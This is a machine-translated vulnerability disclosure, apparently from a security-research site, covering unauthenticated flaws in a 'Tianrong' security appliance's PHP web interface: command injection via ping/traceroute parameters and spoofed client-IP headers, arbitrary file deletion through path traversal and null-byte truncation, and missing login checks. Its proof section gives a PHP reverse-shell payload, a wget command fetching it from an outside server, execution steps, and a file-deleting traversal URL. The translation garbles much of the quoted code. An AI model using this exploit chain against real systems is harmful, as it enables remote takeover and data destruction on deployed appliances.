Tianrong top five high-risk vulnerability Gift Packs final edition (No Logon required)
Tianrong believes that many high-risk vulnerabilities in topic terminal gift packs, command execution, Arbitrary File Deletion, global design defects, etc., do not need to log on, successful shell.
0x01 multiple Command Execution Vulnerabilities
File direct/polling/CommandsPolling. php
include_once 'command/CCmdsPolling.php';$command = isset($_POST['command'])?$_POST['command']:"";$saveFile = isset($_POST['filename'])?$_POST['filename']:"";$cmdParam = isset($_POST['cmdParam'])?$_POST['cmdParam']:"";$cmdParam = trim($cmdParam);$faultStr = json_encode(array('type'=>'event', 'name'=>'message', 'data'=>array("exception", "", "") ));//command is nullif(empty($command)){ echo $faultStr; exit();}//exec and get result$result = array();$pollingObj = new CCmdsPolling();if($command == "ping") { $result = $pollingObj->getPingInfo($cmdParam, $saveFile);} else if ($command == "traceroute") { $result = $pollingObj->getTracerouteInfo($cmdParam, $saveFile);} else { echo $faultStr; exit();}
First, run the following command:
When $ command = "ping", $ partition PARAM and $ saveFile enter the getPingInfo function.
Follow-up file command/csf-spolling. php
Function getPingInfo ($ pingIp, $ saveFile) {$ info = array (); if (empty ($ saveFile) {$ saveFile = self: ping ($ pingIp ); // send the command for the first time, execute the command, and generate the required file}
When $ saveFile is null, continue to follow up the ping function.
function ping($ip) { if(empty($ip)) return ""; $filename = "/tmp/" . self::getClientAddr()."ping".$ip.".txt"; if($ip && $filename) { if(file_exists($filename) ) { unlink($filename); } $cmd = "ping -c 5 $ip > $filename 2>&1 &"; exec("$cmd "); } return $filename; }
Pay attention to the $ filename = "/tmp/". self: getClientAddr (). "ping". $ ip. ". txt ";
Continue to follow up the getClientAddr Function
function getClientAddr(){ unset($onlineip); if($_SERVER['HTTP_CLIENT_IP']) { $onlineip=$_SERVER['HTTP_CLIENT_IP']; }else if($_SERVER['HTTP_X_FORWARDED_FOR']) { $onlineip=$_SERVER['HTTP_X_FORWARDED_FOR']; }else { $onlineip=$_SERVER['REMOTE_ADDR']; } return $onlineip; }
Obtain the ip address directly here, and then return, ignoring the system's GPC = on
The last $ filename is controllable and is executed in exec.
Of course, the ip address here also enters cmd and is executed in exec. Some people Submit the ip address here.
Second, run the command
When $ command = "traceroute", $ extract PARAM and $ saveFile enter the getTracerouteInfo function.
Follow up with the getTracerouteInfo function, file command/c?spolling. php
Function getTracerouteInfo ($ address, $ saveFile) {$ info = array (); if (empty ($ saveFile) {$ saveFile = self: traceroute ($ address ); // send the command for the first time, execute the command, and generate the required file}
Follow up the traceroute function:
function traceroute($address) { if(!$address) return ""; $filename = "/tmp/". self::getClientAddr()."traceroute".$address.".txt"; if($address && $filename) { if(file_exists($filename)) { unlink($filename); } $cmd = "traceroute -m " . self::trace_max_hops . " -n $address > $filename 2>&1 &"; exec("$cmd "); } return $filename; }
Pay attention to the $ filename = "/tmp/". self: getClientAddr (). "ping". $ ip. ". txt ";
Continue to follow up the getClientAddr Function
function getClientAddr(){ unset($onlineip); if($_SERVER['HTTP_CLIENT_IP']) { $onlineip=$_SERVER['HTTP_CLIENT_IP']; }else if($_SERVER['HTTP_X_FORWARDED_FOR']) { $onlineip=$_SERVER['HTTP_X_FORWARDED_FOR']; }else { $onlineip=$_SERVER['REMOTE_ADDR']; } return $onlineip; }
Obtain the ip address directly here, and then return, ignoring the system's GPC = on
The last $ filename is controllable and is executed in exec.
Of course, the ip address here also enters cmd and is executed in exec. Some people Submit the ip address here.
0x02 Arbitrary File Deletion vulnerability in multiple locations
First, delete the file:
File/task/webapi/update. php
require_once("datalayer/CDatalayer.php");include_once "base/CShellExec.php";$shell = new CShellExec();$dl = new DataLayer();$cn = $dl->connectDB();$dl->queryDB($cn,"use scandb");$dl->queryDB($cn,"delete from t_pluginadding");$success = false;$result = $dl->queryDB($cn,"select * from t_SystemProperty where System_Property='vul_current_version'");$row = $dl->fetchArray($result);$vulCurrentVersion = $row["System_Value"];$dl->queryDB($cn,"update t_SystemProperty set System_value='$vulCurrentVersion' where System_Property='vul_old_version'");set_time_limit(0);if($_GET["package"]){$filename = $_GET["package"];$tmpFilename = "/tmp/update_".time().".des";$filename = trim($filename,"\\");$filename = "/tmp/".$filename;$cmd = "/usr/sbin/openssl enc -des -d -a -in ".$filename." -out ".$tmpFilename." -pass pass:[email protected]"; $shell->Execute($cmd,"",true);$dirname = $tmpFilename.".dir";mkdir($dirname,0777);}else{......}......unlink($filename);unlink($tmpFilename);system("rm -rf ".$dirname);echo $success;?>
You can see $ filename = $ _ GET ["package"];
After some operations, there is no exit
At last, $ filename enters unlink, causing any file to be deleted.
Of course, commands are also executed here, where $ shell-> Execute
Because someone has already submitted it, I will not repeat it.
Delete files in the second and third places:
File direct/polling/CommandsPolling. php
include_once 'command/CCmdsPolling.php';$command = isset($_POST['command'])?$_POST['command']:"";$saveFile = isset($_POST['filename'])?$_POST['filename']:"";$cmdParam = isset($_POST['cmdParam'])?$_POST['cmdParam']:"";$cmdParam = trim($cmdParam);$faultStr = json_encode(array('type'=>'event', 'name'=>'message', 'data'=>array("exception", "", "") ));//command is nullif(empty($command)){ echo $faultStr; exit();}//exec and get result$result = array();$pollingObj = new CCmdsPolling();if($command == "ping") { $result = $pollingObj->getPingInfo($cmdParam, $saveFile);} else if ($command == "traceroute") { $result = $pollingObj->getTracerouteInfo($cmdParam, $saveFile);} else { echo $faultStr; exit();}
$ Saveparam, $ saveFile parameters enter the getPingInfo and getTracerouteInfo functions respectively.
Follow up with the getPingInfo and getTracerouteInfo Functions
Function getPingInfo ($ pingIp, $ saveFile) {$ info = array (); if (empty ($ saveFile) {$ saveFile = self: ping ($ pingIp ); // send the command for the first time, execute the command, and generate the required file }...... function ping ($ ip) {if (empty ($ ip) return ""; $ filename = "/tmp /". self: getClientAddr (). "ping ". $ ip. ". txt "; if ($ ip & $ filename) {if (file_exists ($ filename) {unlink ($ filename );} $ cmd = "ping-c 5 $ ip> $ filename 2> & 1 &"; exec ("$ cmd") ;}return $ filename ;}...... function getClientAddr () {unset ($ onlineip); if ($ _ SERVER ['HTTP _ CLIENT_IP ']) {$ onlineip = $ _ SERVER ['HTTP _ CLIENT_IP'];} else if ($ _ SERVER ['HTTP _ X_FORWARDED_FOR ']) {$ onlineip = $ _ SERVER ['HTTP _ X_FORWARDED_FOR'];} else {$ onlineip = $ _ SERVER ['remote _ ADDR '];} return $ onlineip ;}
Visible in the getPingInfo function, and then enter the ping function when $ saveFile is empty.
Then in the ping function:
$ Filename = "/tmp/". self: getClientAddr (). "ping". $ ip. ". txt ";
In the getClientAddr function, retrieve the IP address from $ _ SERVER and return
So here we ignore GPC, and when this system is on, GPC = on's
Finally, the $ filename in the ping function is controllable, and $ filename enters the unlink function.
$ Filename value can be truncated at % 00, causing deletion of arbitrary files
The third part is the same as the second part.
In the traceroute function, $ filename is controllable and $ filename enters the unlink function.
$ Filename value can be truncated at % 00, causing deletion of arbitrary files
0x03 global design defects
Why is it global? Because this is a security product, it is said that all active/active functions should be post-login operations.
However, the corresponding function operation here is that the logon status is not verified at all.
Therefore, the global page function can be operated without logon.
This system has a global logon verification function:
For example, in the direct/polling/progressbarPolling. php file
If (! ($ UserName = GetSessionVariable ('username') {// obtain the logon userName echo json_encode (array ('type' => 'event ', 'name' => 'np _ probe_device_alive_event ', 'data' => false); exit ();}
The logon status is verified here. If the session does not contain username, exit. Check the GetSessionVariable function.
File base/session. php
function GetSessionVariable($key){ return $_SESSION[netpower][$key];}
Get userName from session
However, such verification is not used in more than 95% of the regions.
For example, device/device_export.php can directly export device information.
Distribute/vuldetial. php plug-in vulnerability information
Policy/param_export.php policy information Export
Task/task_export.php task information Export
And so on.
Command Execution proof:
When command = ping, filename is empty, and limit Param is not empty
1. Place shell. php on vps with the following content:
$sock=fsockopen("*.*.*.*",61234);exec("/bin/sh -i <&3 >&3 2>&3");?>
2. Run the command here to download the shell. php file to the target tmp directory.
wget http://*.*.*.*:8888/shell.php -O /tmp/shell.php
3. Run the following command to execute the downloaded/tmp/shell. php file.
php -f /tmp/shell.php
4. Successful shell Rebound
The same is true when command = traceroute
Proof of File Deletion:
Upload a file without logging on to the file due to design defects.
File device/device_import.php
/** Upload File */$ UploadAction = 0; $ TimeLimit = 60; /* set the time-out limit. The default time is 30 seconds. If it is set to 0, it is not limited. */set_time_limit ($ TimeLimit ); if (move_uploaded_file ($ _ FILES ["importUpload"] ["tmp_name"], "/tmp /". $ _ FILES ["importUpload"] ["name"]) {chmod ("/tmp /". $ _ FILES ["importUpload"] ["name"], 0777); echo '{success: true, file :'. json_encode ('file has been stored :'. '/tmp /'. $ _ FILES ['ortupload'] ['name']). '}';} else {echo '{faliure: true, file: Upload Error !} ';} Set_time_limit (30); // restore the default timeout setting?>
Upload the file to tmp:
Uploaded successfully:
Send request:
**.**.**.**/task/webapi/update.php?package=../../../../../../../tmp/1
You can delete the file/tmp/1.
Deleted